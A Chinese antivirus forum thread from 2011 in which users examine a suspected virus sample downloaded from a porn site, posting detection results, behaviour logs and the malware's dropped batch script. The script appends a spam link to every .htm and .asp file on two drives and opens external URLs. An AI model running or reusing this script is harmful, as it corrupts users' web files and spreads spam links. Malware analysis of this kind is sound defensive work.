在一个黄网上下到的东西，估计是病毒。请甄别

显示全部楼层 · 发表于 2011-10-20 09:21:55

数字云鉴定转人工
上报ESET看结果~~~

显示全部楼层 · 发表于 2011-10-20 09:25:46

FS 干掉了

显示全部楼层 · 发表于 2011-10-20 09:25:47

ESS今天还没有报

显示全部楼层 · 发表于 2011-10-20 09:39:32

2011-10-20 09:23:04 创建新进程允许
进程: c:\windows\explorer.exe
目标: e:\downloads\一网打尽\一网打尽.exe
命令行: "E:\downloads\一网打尽\一网打尽.EXE"
规则: [应用程序]*

2011-10-20 09:23:27 修改注册表值阻止
进程: e:\downloads\一网打尽\一网打尽.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b2ca5818-e31a-11e0-b48d-806d6172696f}\BaseClass
值: Drive
规则: [注册表]*

2011-10-20 09:23:51 创建文件允许
进程: e:\downloads\一网打尽\一网打尽.exe
目标: C:\WINDOWS\temp\518670.bat
规则: [文件组]所有执行文件 -> [文件]*; *.bat

2011-10-20 09:24:46 修改注册表值阻止
进程: e:\downloads\一网打尽\一网打尽.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\temp\518670.bat
值: 518670
规则: [注册表]*

2011-10-20 09:24:53 创建新进程允许
进程: e:\downloads\一网打尽\一网打尽.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c ""C:\WINDOWS\temp\518670.bat" 程序运行参数"
规则: [应用程序]*

2011-10-20 09:25:18 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /S /D /c" dir d:\ /s /b "
规则: [应用程序]*

2011-10-20 09:25:27 创建文件允许
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\temp\1.txt
规则: [文件]*

2011-10-20 09:25:41 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\find.exe
命令行: find /I ".htm"
规则: [应用程序]*

2011-10-20 09:26:03 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /S /D /c" dir d:\ /s /b "
规则: [应用程序]*

2011-10-20 09:26:09 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\find.exe
命令行: find /I ".asp"
规则: [应用程序]*

2011-10-20 09:26:14 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /S /D /c" dir e:\ /s /b "
规则: [应用程序]*

2011-10-20 09:26:20 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\find.exe
命令行: find /I ".htm"
规则: [应用程序]*

2011-10-20 09:26:24 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /S /D /c" dir e:\ /s /b "
规则: [应用程序]*

2011-10-20 09:26:32 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\find.exe
命令行: find /I ".asp"
规则: [应用程序]*

2011-10-20 09:26:55 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\explorer.exe
命令行: explorer.exe "http://a.54261.com/"
规则: [应用程序]*

2011-10-20 09:27:09 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\explorer.exe
命令行: explorer.exe "http://www.lunlizy.org/yv/Index.html"
规则: [应用程序]*

2011-10-20 09:27:29 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\explorer.exe
命令行: explorer.exe "http://www.zcmfw.com"
规则: [应用程序]*

2011-10-20 09:28:40 结束其他进程允许
进程: c:\windows\explorer.exe
目标: c:\program files\internet explorer\iexplore.exe
规则: [应用程序]c:\windows\explorer.exe

显示全部楼层 · 发表于 2011-10-20 09:45:09

显示全部楼层 · 发表于 2011-10-20 09:48:10

绅博周幸发表于 2011-10-20 08:24

病毒研究员通知，你不是把金山清楚你的电脑了吗？怎么还有？

显示全部楼层 · 发表于 2011-10-20 09:50:34

kis2012 miss

显示全部楼层 · 发表于 2011-10-20 09:53:06

显示全部楼层 · 发表于 2011-10-20 10:02:22

Created process: (null),"C:\Windows\temp\484373.bat" 程序运行参数,C:\Windows\temp
Defined file type copied to Windows folder: C:\Windows\temp\484373.bat
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 = created registry key
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 = created registry key

显示全部楼层 · 发表于 2011-10-20 10:05:31

484373.bat

dir d:\ /s /b | find /I ".htm" >>1.txt
dir d:\ /s /b | find /I ".asp" >>1.txt
dir e:\ /s /b | find /I ".htm" >>1.txt
dir e:\ /s /b | find /I ".asp" >>1.txt

@for /f %%i in (1.txt) do echo ^<a href="http://www.zcmfw.com"^>^zcmfw^</a^>^ >> %%i

@del /s/f/q "d:\1.txt"
@del /s/f/q "e:\1.txt"

explorer.exe "http://a.54261.com/"
explorer.exe "http://www.lunlizy.org/yv/Index.html"
explorer.exe "http://www.zcmfw.com"

[病毒样本] 在一个黄网上下到的东西，估计是病毒。请甄别

本帖子中包含更多资源

本帖子中包含更多资源